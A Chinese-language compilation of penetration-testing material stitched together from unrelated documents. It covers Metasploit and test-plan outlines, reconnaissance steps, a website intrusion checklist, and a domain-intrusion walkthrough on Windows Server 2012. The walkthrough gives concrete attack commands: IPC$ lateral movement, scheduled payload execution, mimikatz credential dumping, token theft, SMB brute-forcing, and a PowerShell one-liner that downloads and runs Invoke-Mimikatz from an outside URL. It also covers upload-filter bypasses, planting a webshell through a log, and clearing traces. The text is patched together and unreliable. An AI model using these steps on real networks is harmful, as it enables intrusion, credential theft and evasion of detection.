域渗透测试教程
Metasploit简单的渗透测试案例

Metasploit简单的渗透测试案例案例背景:假设我们是一家网络安全公司的安全分析师,我们被雇佣来测试一些公司的网络安全性。
我们已经通过一些信息收集技术获得了公司的IP地址和域名。
现在我们将使用Metasploit来测试他们的网络安全性。
步骤1:信息收集首先,我们使用一些信息收集工具(如nmap)来确定目标公司的网络拓扑和开放端口。
通过分析这些信息,我们可以确定潜在的攻击目标。
步骤2:扫描漏洞接下来,我们使用Metasploit的漏洞扫描工具(如Nexpose)来扫描目标网络上的漏洞。
这些漏洞可能包括操作系统漏洞、应用程序漏洞、配置错误等。
通过扫描漏洞,我们可以确定哪些系统存在安全风险。
步骤3:选择攻击模块根据我们在步骤2中发现的漏洞,我们选择相应的攻击模块。
例如,如果我们发现目标系统上存在一个已知的漏洞,我们可以选择使用Metasploit的相应模块进行攻击。
步骤4:配置攻击模块在选择了攻击模块后,我们需要配置一些参数以适应目标系统。
这些参数可能包括目标IP地址、端口号、漏洞类型等。
我们可以使用Metasploit的命令行界面或图形界面来配置这些参数。
步骤5:执行攻击一旦我们配置好了攻击模块,我们可以使用Metasploit的exploit 命令来执行攻击。
Metasploit将尝试利用目标系统上的漏洞来获取对系统的控制权。
步骤6:获取权限一旦攻击成功,我们需要获取对目标系统的权限。
我们可以使用Metasploit的post-exploitation模块来执行各种任务,如查找敏感信息、提权、创建后门等。
步骤7:清理痕迹在完成渗透测试后,我们应该清理所有的痕迹,以确保我们没有留下任何可追溯的证据。
Metasploit提供了一些模块来执行这些任务,如清除日志、删除后门等。
步骤8:报告编写最后,我们应该撰写一份详细的报告,描述我们在渗透测试过程中发现的漏洞、攻击的成功率以及建议的修复措施。
这个报告将帮助目标公司了解他们的网络安全状况,并采取适当的措施来加强安全性。
渗透测试方案

渗透测试方案一、介绍渗透测试是一种模拟攻击的安全评估方法,通过模拟黑客攻击的方式,评估目标系统的安全性。
本渗透测试方案旨在提供一套系统化、全面的渗透测试方法,确保识别系统中的安全漏洞并为其提供解决方案。
二、目标与范围1.目标:对目标系统的安全性进行评估,发现和利用可能存在的漏洞。
2.范围:包括目标系统的网络、应用程序、服务器、数据库等。
三、方法和技术1.信息收集:收集目标系统的相关信息,包括IP地址、域名、子域名、相关人员信息等。
-使用WHOIS查询服务获取域名注册信息;- 使用nmap、masscan等工具进行端口扫描,了解目标系统开放的端口和运行的服务;- 使用shodan、zoomeye等工具进行,查找与目标系统相关的公开资料。
2.漏洞评估:通过对目标系统进行安全扫描和漏洞评估,发现系统中存在的安全漏洞。
- 使用漏洞扫描工具(如Nessus、OpenVAS)对目标系统进行扫描,检测网络设备和系统的已知漏洞;-对目标应用程序进行渗透测试,包括输入验证、访问控制、会话管理的评估;-对目标系统进行密码破解测试,包括弱密码检测、字典攻击等。
3.渗透攻击:模拟实际黑客攻击,主动利用系统中的安全漏洞。
- 使用Metasploit等渗透测试工具进行攻击模拟,包括远程执行命令、文件上传、代码注入等;-利用漏洞编写自定义的攻击脚本,提高攻击成功率;-关注系统日志和入侵检测系统,避免对目标系统造成损害。
4.数据分析与整理:对获取的漏洞信息和攻击结果进行整理和分析,并形成渗透测试报告。
-对扫描和攻击结果进行整理和分类,包括系统漏洞、应用程序漏洞及给出的建议;-制作渗透测试报告,包括测试目的、范围、方法、发现的漏洞、修复措施等;-提出改进建议,帮助目标系统提升安全性。
五、诚信原则和法律合规1.诚信原则:在进行渗透测试过程中,要尊重被测系统的所有权利、知识产权和使用权,严禁滥用测试权限。
2.法律合规:遵守国家相关法律和规定,在获得目标系统的合法授权后进行渗透测试,不得进行非法攻击、破坏或盗取数据等违法行为。
渗透测试信息收集步骤

渗透测试信息收集步骤渗透测试是一种通过模拟攻击来评估计算机系统、网络或应用程序的安全性的方法。
在进行渗透测试之前,信息收集是非常重要的一步,它可以帮助渗透测试人员了解目标系统的情况,从而更好地制定攻击策略。
下面将介绍渗透测试信息收集的步骤。
一、确定目标在进行信息收集之前,首先需要确定目标。
目标可以是一个网站、一个网络或一个应用程序等。
确定目标后,就可以开始进行信息收集。
二、主动信息收集1. Whois查询Whois查询是通过域名查询注册人以及注册商等相关信息的方式。
通过Whois查询可以获取到域名注册人的联系方式、域名注册时间、域名过期时间等信息。
2. DNS枚举DNS枚举是指通过DNS服务器获取指定域名下所有子域名和对应IP 地址的过程。
可以使用工具如Dig、Nslookup等进行DNS枚举。
3. 网络拓扑分析网络拓扑分析是指通过路由跳数、端口扫描等方式获取目标网络结构和设备配置等信息。
可以使用工具如Nmap、Angry IP Scanner等进行网络拓扑分析。
4. 网站抓取网站抓取是指获取网站内所有链接和页面的过程。
可以使用工具如Wget、HTTrack等进行网站抓取。
5. 社交工程学社交工程学是指通过与目标人员的交流获取相关信息的过程。
可以通过社交网络、电话、邮件等方式进行社交工程学信息收集。
三、被动信息收集1. 开放式情报收集(OSINT)开放式情报收集是指通过公共资源获取相关信息的过程。
可以通过搜索引擎、论坛、博客等方式进行开放式情报收集。
2. 漏洞公告漏洞公告是指由厂商或第三方发布的关于系统或软件漏洞的通知。
可以通过订阅漏洞公告邮件、查看漏洞数据库等方式获取漏洞公告。
3. 旁注攻击旁注攻击是指在攻击目标系统时,利用其他系统或服务来获取目标系统的相关信息。
例如,通过攻击目标网络中一台未经授权的路由器来获取目标网络结构和设备配置等信息。
四、总结以上就是渗透测试信息收集的步骤。
在进行渗透测试时,不仅需要掌握各种渗透测试技术,还需要了解目标系统的情况,从而更好地制定攻击策略。
简述渗透测试的基本过程

简述渗透测试的基本过程渗透测试(Penetration Testing)是一种评估计算机系统、网络或应用程序安全性的方法,旨在模拟攻击者的行为,发现系统中存在的安全漏洞,并提供修复建议,以增强系统的安全性。
下面将简要介绍渗透测试的基本过程。
1. 确定测试范围在进行渗透测试之前,首先需要明确测试的范围,包括测试的目标、系统的组成部分、网络拓扑结构等。
确定测试范围可以有效地指导测试工作的开展,确保测试的全面性和有效性。
2. 收集信息在进行渗透测试时,收集目标系统的信息是非常重要的一步。
信息收集可以包括获取目标系统的IP地址、域名、子域名、系统架构、开放端口、服务版本信息等。
通过信息收集,可以帮助测试人员更好地了解目标系统,有针对性地进行后续测试。
3. 漏洞扫描漏洞扫描是渗透测试的重要环节之一,通过使用专门的漏洞扫描工具对目标系统进行扫描,发现系统中存在的安全漏洞。
漏洞扫描可以帮助测试人员及时发现系统中的弱点,为后续的攻击模拟提供有效的依据。
4. 渗透测试在进行渗透测试时,测试人员会模拟黑客的攻击行为,尝试利用已知的漏洞或攻击技术获取系统的未授权访问权限。
通过尝试各种攻击手段,测试人员可以评估系统的安全性,并发现系统中存在的潜在风险。
5. 提权和权限维持在渗透测试过程中,测试人员通常会尝试提升自己的权限,获取更高级别的系统访问权限。
通过提权和权限维持的测试,可以评估系统对特权操作的监控和限制情况,帮助提高系统的安全性。
6. 数据采集和报告在完成渗透测试后,测试人员会对测试过程中收集的数据进行整理和分析,编写测试报告。
测试报告通常包括测试的方法、发现的漏洞、风险评估、修复建议等内容,为系统管理员提供改进系统安全性的指导。
总结通过以上几个基本步骤,渗透测试可以帮助组织评估自身系统的安全性,及时发现和修复潜在的安全风险,提升系统的整体安全水平。
渗透测试是一项持续的工作,需要定期进行,以确保系统的安全性能得到有效维护和提升。
渗透测试的8个步骤展现一次完整的渗透测试过程及思路

渗透测试的8个步骤展现⼀次完整的渗透测试过程及思路渗透测试这个事情不是随便拿个⼯具就可以做了,要了解业务还需要给出解决⽅案。
之前安全加介绍了⾦融⾏业实战微信银⾏渗透测试,运营商渗透测试实战,今天让我们来说说渗透测试的流程及渗透测试相关概念。
渗透测试流程渗透测试与⼊侵的最⼤区别渗透测试:出于保护系统的⽬的,更全⾯地找出测试对象的安全隐患。
⼊侵:不择⼿段地(甚⾄是具有破坏性的)拿到系统权限。
⼀般渗透测试流程流程并⾮万能,只是⼀个⼯具。
思考与流程并⽤,结合⾃⼰经验。
2.1 明确⽬标确定范围:测试⽬标的范围,ip,域名,内外⽹。
确定规则:能渗透到什么程度,时间?能否修改上传?能否提权等。
确定需求:web应⽤的漏洞(新上线程序)?业务逻辑漏洞(针对业务的)?⼈员权限管理漏洞(针对⼈员、权限)?等等。
(⽴体全⽅位)根据需求和⾃⼰技术能⼒来确定能不能做,能做多少。
2.2 信息收集⽅式:主动扫描,开放搜索等开放搜索:利⽤搜索引擎获得,后台,未授权页⾯,敏感url等。
基础信息:IP,⽹段,域名,端⼝系统信息:操作系统版本应⽤信息:各端⼝的应⽤,例如web应⽤,邮件应⽤等等版本信息:所有这些探测到的东西的版本。
服务信息⼈员信息:域名注册⼈员信息,web应⽤中⽹站发帖⼈的id,管理员姓名等。
防护信息:试着看能否探测到防护设备2.3 漏洞探索利⽤上⼀步中列出的各种系统,应⽤等使⽤相应的漏洞。
⽅法:1.漏扫,awvs,IBM appscan等。
2.结合漏洞去exploit-db等位置找利⽤。
3.在⽹上寻找验证poc。
内容:系统漏洞:系统没有及时打补丁Websever漏洞:Websever配置问题Web应⽤漏洞:Web应⽤开发问题其它端⼝服务漏洞:各种21/8080(st2)/7001/22/3389通信安全:明⽂传输,token在cookie中传送等。
2.4 漏洞验证将上⼀步中发现的有可能可以成功利⽤的全部漏洞都验证⼀遍。
渗透测试方案讲解

渗透测试方案讲解渗透测试是指通过模拟黑客攻击的方式,来评估信息系统的安全性和漏洞,并提供改进建议的过程。
渗透测试方案是进行渗透测试的详细计划和流程。
下面是一个渗透测试方案的讲解,包括准备工作、测试流程、目标确定、漏洞扫描、攻击和渗透、报告撰写等几个关键步骤。
一、准备工作在进行渗透测试之前,需要进行一些必要的准备工作。
首先,需要明确测试目标,明确测试的范围和目标系统、应用或网络。
其次,需要获得授权,确保测试合法合规,并与系统管理员或信息安全团队进行沟通和协调。
然后,需要建立测试环境,搭建实验室或虚拟环境,以便进行安全测试,同时确保不会对目标系统产生任何负面影响。
最后,需要准备测试工具和资源,如渗透测试工具、虚拟机、实验数据等。
二、目标确定在进行渗透测试时,需要明确测试的目标,即明确要测试的系统、应用或网络。
目标确定的过程中,需要进行信息收集,获取尽可能多的关于目标的信息,如IP地址、域名、网络拓扑等。
还需要分析目标系统的特点,了解其应用和运行环境,以便制定更有针对性的测试策略。
三、漏洞扫描漏洞扫描是渗透测试的关键步骤之一,通过使用漏洞扫描工具,对目标系统进行全面扫描,找出可能存在的漏洞和安全风险。
漏洞扫描需要依据目标系统和应用的特点,选择合适的漏洞扫描工具,并根据扫描结果进行进一步的分析和评估。
四、攻击和渗透攻击和渗透是模拟黑客攻击的过程,通过使用各种攻击手段和技术,尝试入侵到目标系统中。
在进行攻击和渗透时,需要使用一些渗透测试工具,如Metasploit、Nessus等,利用已知的漏洞和安全弱点进行攻击,并尝试获取非法访问权限或敏感信息。
对于未知的漏洞和安全风险,需要进行进一步的研究和分析,以便提供更准确的测试结果和建议。
五、报告撰写在完成攻击和渗透的过程后,需要对测试结果进行分析和总结,并撰写渗透测试报告。
渗透测试报告应包含测试的过程、目标系统的安全风险和漏洞、测试结果的影响评估、改进建议等内容。
渗透测试流程概述

渗透测试流程概述渗透测试是指通过模拟黑客攻击的方式,对目标系统进行安全漏洞的评估和发现。
它是一种主动的安全检测方法,旨在发现系统中存在的漏洞,并提供相应的修复建议,以加强系统的安全性。
渗透测试流程是指在进行渗透测试时所需要遵循的一系列步骤和方法。
渗透测试流程可以概括为以下几个步骤:1. 信息收集:渗透测试的第一步是收集目标系统的相关信息,包括域名、IP地址、操作系统、软件版本等。
这可以通过公开的信息、WHOIS查询、搜索引擎、社交网络等方式获得。
信息收集的目的是为了了解目标系统的架构和漏洞,为后续的攻击提供依据。
2. 漏洞扫描:在信息收集的基础上,渗透测试人员使用各种漏洞扫描工具对目标系统进行扫描,以发现系统中存在的已知漏洞。
漏洞扫描是渗透测试的核心环节,通过扫描工具可以自动化地发现系统中存在的漏洞,并生成相应的报告。
3. 漏洞利用:在发现系统中存在漏洞后,渗透测试人员会尝试利用这些漏洞进行攻击。
漏洞利用的方式多种多样,包括代码注入、文件包含、命令执行、SQL注入等。
通过成功利用漏洞,渗透测试人员可以获取系统的敏感信息、远程控制系统,甚至是提权到系统管理员权限。
4. 权限提升:在成功进入目标系统后,渗透测试人员通常会试图提升自己的权限,以获取更高的权限和更多的敏感信息。
权限提升的方式包括提权漏洞利用、密码破解、社会工程学等。
通过提升权限,渗透测试人员可以更加深入地探测系统的安全性。
5. 持久化访问:为了长期地访问目标系统,渗透测试人员通常会在系统中留下后门或者其他的访问方式。
这样可以在渗透测试结束后,继续对系统进行监控和攻击。
持久化访问可以通过添加用户账号、安装后门程序等方式实现。
6. 清理痕迹:在完成渗透测试后,渗透测试人员需要清理自己在目标系统中留下的痕迹,包括删除日志、删除后门程序、恢复修改的配置文件等。
清理痕迹的目的是为了不留下任何可以被他人发现的线索,保护目标系统的安全。
7. 报告撰写:渗透测试的最后一步是编写渗透测试报告。
如何正确的进行网站入侵渗透测试

如何正确的进⾏⽹站⼊侵渗透测试⼤家都知道渗透测试就是为了证明⽹络防御按照预期计划正常运⾏⽽提供的⼀种机制,⽽且够独⽴地检查你的⽹络策略,⼀起来看看⽹站⼊侵渗透测试的正确知识吧。
简单枚举⼀些渗透⽹站⼀些基本常见步骤:⼀ 、信息收集要检测⼀个站⾸先应先收集信息如whois信息、⽹站真实IP、旁注、C段⽹站、服务器系统版本、容器版本、程序版本、数据库类型、⼆级域名、防⽕墙、维护者信息有哪些等等
⼆、收集⽬标站注册⼈邮箱1.⽤社⼯库⾥看看有没有泄露密码,然后尝试⽤泄露的密码进⾏登录后台。2.⽤邮箱做关键词,丢进搜索引擎。3.利⽤搜索到的关联信息找出其他邮进⽽得到常⽤社交账号。4.社⼯找出社交账号,⾥⾯或许会找出管理员设置密码的习惯 。5.利⽤已有信息⽣成专⽤字典。6.观察管理员常逛哪些⾮⼤众性⽹站,看看有什么东西
三、判断出⽹站的CMS1:查找⽹上已曝光的程序漏洞并对其渗透2:如果开源,还能下载相对应的源码进⾏代码审计。3.搜索敏感⽂件、⽬录扫描四、常见的⽹站服务器容器。IIS、Apache、nginx、Lighttpd、Tomcat五、注⼊点及漏洞1.⼿动测试查看有哪些漏洞2.看其是否有注⼊点3.使⽤⼯具及漏洞测试平台测试这个有哪些漏洞可利⽤六、如何⼿⼯快速判断⽬标站是windows还是linux服务器?inux⼤⼩写敏感,windows⼤⼩写不敏感。七、如何突破上传检测?1:宽字符注⼊2:hex编码绕过3:检测绕过4:截断绕过⼋、若查看到编辑器应查看编辑器的名称版本,然后搜索公开的漏洞九、上传⼤马后访问乱码浏览器中改编码。⼗、审查上传点的元素有些站点的上传⽂件类型的限制是在前端实现的,这时只要增加上传类型就能突破限制了。⼗⼀、15:某个防注⼊系统,在注⼊时会提⽰:系统检测到你有⾮法注⼊的⾏为。已记录您的ip xx.xx.xx.xx时间:XXXX提交页⾯:xxxx提交内容:and 1=1
可以直接⽤这个防注⼊系统拿到shell,在URL⾥⾯直接提交⼀句话,这样⽹站就把你的⼀句话也记录进数据库⽂件了 这个时候可以尝试寻找⽹站的配置⽂件 直接上菜⼑链接。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
域渗透测试教程(windows server2012)乌云ID:大山的放羊娃域渗透测试教程(windows server2012) (1)前言 (2)第一步反弹meterpreter (2)第二步尝试提权windows server2012 (4)第三步尝试当前账号Bypassuac测试 (5)第四步相关信息收集 (6)第五步信息分析,成功获取一台服务器权限 (8)第六步域信息收集 (10)第七步SMB快速扩张控制权限 (16)第八步Poershell获取域控管理员在线的机器 (18)第九步域控管理员权限的获取(windows2012权限) (20)第十步域控我来了(msf psexec反弹shell) (22)第十一步Meterpreter获取所有用户的hash (24)第十二步曲折的探索之路 (25)第十三步我轻轻的来了,我又轻轻的走了,管理员,再见(清理) (26)总结 (27)前言内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里。
于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求。
今天小菜我本着所有师傅们无私分享的精神,特将三年内求师傅,求妹子,求神器所得,经过整理后,关键的知识点写出来。
相关知识点总结如下:●免杀payload的生成,请使用Veil●msf在meterpreter下的提权尝试●msf在meterpreter下的bypassuac尝试●内网渗透测试过程中的信息关联●meterpreter的路由添加以及相关扫描●Powershell在meterpreter下面的使用●Meterpreter的post模块使用●Msf的custom自己生成的payload的使用●进程注入窃取令牌其实重点不在于知识的多少,大家只需关注比较重点的连接点。
分享为了方便大家以后一起交流,一起学习,一起进步。
首先shell是别人给我的,也不是这里介绍的重点,所以在此忽略。
渗透测试的环境详细如下:A堡垒机(webshell所在机器):windows server2012B堡垒机:windows2008(powershell扫描机器)C堡垒机:有域管理进程的机器windows server2012D堡垒机若干第一步反弹meterpreter其实每一次的渗透测试开始并不像我们想象的那么顺利,而这一次的开始也同样意味着我们一次不同的旅程,整个的渗透测试过程我花了差不多四个小时的时间,大部分的时间都是花在解决这些问题之上。
1webshell无法上传exe本来想着直接上传meterpreter的payload的直接反弹的结果发现上传不了,可以选择powershell的meterpreter的模块来实现2meterpreter的reverse_tcp模块反弹不成功Msf的payload的反弹,刚开始我使用的模块是meterpreter的reverse_tcp的模块来尝试,发现可以反弹,但是一直无法建立成功meterpreter,说明一定有监控发现了我们的行为。
于是在此基础上尝试meterpreter的reverse_https模块,顺利反弹成功详细遇到的问题和解决过程的图如下所示:图1-1使用payload图1-2设置https的payload图1-3反弹成功第二步尝试提权windows server2012当我们首先拿到一个Webshell的时候想到的第一件事是什么?那肯定是提权,我也想大家想的一样,首先开始了我们的提权之旅。
首先使用msf的search模块ms15,会得到一些漏洞利用的模块。
我尝试了ms15_05以及ms15_078全部以失败结束。
详细的图如下所示:图2-1提权尝试失败第三步尝试当前账号Bypassuac测试刚开始一直忘说了一件事,那就是webshell本身的权限,我们目前webshell 是jsp的,具有当前的一个普通域用户的权限。
我于是也想到了是不是可以通过bypassuac来完成提权呢,但是测试的结果可想而知,又一次失败了。
目前详细的情况如下:图3-1当前的用户权限图3-2bypassuac尝试第四步相关信息收集当我们此时提权不成功的情况下,我们还是可以利用当前的用户进行域渗透测试的。
那么目前我们具有以下几种方式进行渗透测试域:1收集域里面的相关信息,包括所有的用户,所有的电脑,以及相关关键的组的信息。
常使用到的命令如下:net user/domainNet group“domain computers”/domainnet group“domain admins”/domain#查看域管理员net localgroup administratorsnet view/domain2收集sqlserver的相关信息,如果当前堡垒机使用了sql server的话,恰巧用户是当前的域用户的话,我们在此可以使用sqlcmd的信息收集,以及扫描攻击。
在这里只是提到,因为篇幅问题,暂时不做深一层讨论根据我的渗透测试经验,我在此只是做了最简单的信息收集,首先使用sqlcmd的获取sql server的所有机器列表、当前堡垒机的机器名、当前堡垒机的IP、还有net view来做简单的信息收集。
详细的图如下所示:图4-1SQLCMD获取信息图4-2当前的机器名图4-3net view相关的机器名第五步信息分析,成功获取一台服务器权限当我们信息收集完成以后,我们要开始考虑接下来要做什么。
首先我们来看一下我们目前拥有什么:A一个域用户的进程权限,当前堡垒机是windows server2012,提权失败。
(假如能提权成功,我们依然是无法获取到用户的明文密码)B当前的堡垒机的用户名C当前sqlcmd获取到的同样安装了sql server机器的名称目前我们的思路有:1使用meterpreter的目前权限来添加路由进行弱口令扫描2使用powershell对内网进行扫描(本次渗透测试使用了,但是在这里暂时没有使用),具体来说时间比较慢一点,当然此时此刻powershell绝对算是一个内网渗透测试又一神器3使用当前的用户权限架设socks4a,然后利用第一步我们获取到的信息socks进行内网扫描4使用当前用户的权限,对域里面的电脑进行IPC,或者DIR溢出(也就是dir其他电脑的c盘,如果成功表示有权限)批量测试通过上面的分析,此时我选择了最偷懒的一种方法,进行当前堡垒机的机器名和net view的机器名进行对比,找出来非常相似的几个机器名,手动测试。
当前速度也是非常快的,在尝试了两次的时候就成功了。
详细过程如下:Net use\\ip\c$Tasklist/v/s ip图5-1net use测试成功图5-2tasklist执行成功第六步域信息收集首先在第四步已经说了域相关的信息收集,这里就不做过多的介绍了,这次是在第五步的基础上做的相关收集,相关知识点如下:1域信息收集,其中用到的命令如下:Net group“domain admins”/domainNet group/domainNet group“domain controllers”/domainNet group“enterprise admins”/domain2ipc$入侵,大家相关的话自行百度经典IPC$入侵Net use\\ip\c$Copy bat.bat\\ip\c$(其中bat.bat是powershell的meterpreter)Net time\\ipAt\\ip time c:\bat.bat3上传抓明文工具64.exe(mimikatz神器),大家都懂的Upload/home/64.exe c:\ShellCd\64.Exe4查看抓取到的用户的详细信息Net use xxx/domain5使用meterpreter的ps,查看相关用户的进程列表6尝试使用域令牌假冒Use incongnitolist_token-uImpersonate_token xxxxxx我在这次渗透测试过程中尝试上面讲到的所有知识点,详细的截图如下:图6-1查看域管图6-2查看域组图6-3查看域控制器图6-4查看企业管理组图6-5共享copy数据图6-6经典ipc$图6-7反弹meterpreter成功图6-8上传文件图6-9查看服务器信息图6-10抓取密码图6-11查看域用户权限图6-12查看域用户权限图6-13窃取令牌尝试图6-14查看主域控的IP第七步SMB快速扩张控制权限此时此刻,作为读者你的在想什么呢?是不是当看到第六步的时候就可以去睡觉了,毕竟已经凌晨五点了。
但是此时此刻作为一个专业求师傅,求妹子,求神器的人可不这么想。
我们要做最后的冲刺,因为黎明的钟声已经敲响。
先来看一下我们当前拥有什么权限:有两台堡垒机,两个用户权限目前我们要做的事情很简单,就是快速的在内网扩大控制权限,那么如何去做,其实很简单的,就是快速的扫描以完成我们的梦想。
具体如下:1使用当前获取到的两个用户权限,快速的进行扫描。
扫描哪里了,看到第六步最后一张图6-14了没,就是域控的IP段2smb_login扫描3端口转发进内网目前思路我们已经有了,神器msf终于迎来了自己梦想恶天堂。
让我们愉快的玩耍吧。
详细知识点如下:1msf添加路由route add ip mask sessionid2smb_login模块或者使用psexec_scanner(这个模块需要你自己搜索一下)3meterpreter端口转发4msf的socks4a模块(这次渗透测试没使用到,但是并不代表它不美好)图7-1设置smb_login的参数图7-2爆破成功的机器图7-3查看已经获取到的权限图7-4端口转发和目前拥有的权限第八步Poershell获取域控管理员在线的机器内网渗透测试不得不说到两大神器:msf和powershell,但是看大家基本上都是分开来使用的,或者说大家在一次渗透测试的过程中很少遇到,今天作为读者的你有福了。
首先来讲讲powershell的在内网渗透测试中不仅能扫,能爆,能转发,当然还能做更多的事情,一般使用到的模块有下面三个:1Empire据说是神器,也确实是神器,我没使用过,暂时不多说2PowerUp据说提权神器,也确实是神器,我很少使用。
也暂时不多说3PowerView据说是域渗透神器,也确实是神器,我一直用,非常漂亮来说说powershell的使用,其实也很简单,只是大家在用的过程中一般没有太多的注意,主要有三种方式来调用:1当然是下载到本地执行,详细使用方法如后面连接:powershell"IEX(New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI');Invoke-Mimikatz-DumpCreds"2第二种方式是把powershell文件上传到堡垒机本地执行,powershell.exe-exec bypass-Command"&{Import-Module.\powerview.ps1;Invoke-UserHunter}"3上传到对方本地,然后Import-Module导入,使用PowerView的所有模块使用其实很简单,直接调用方法,大家看看下面的图就知道了。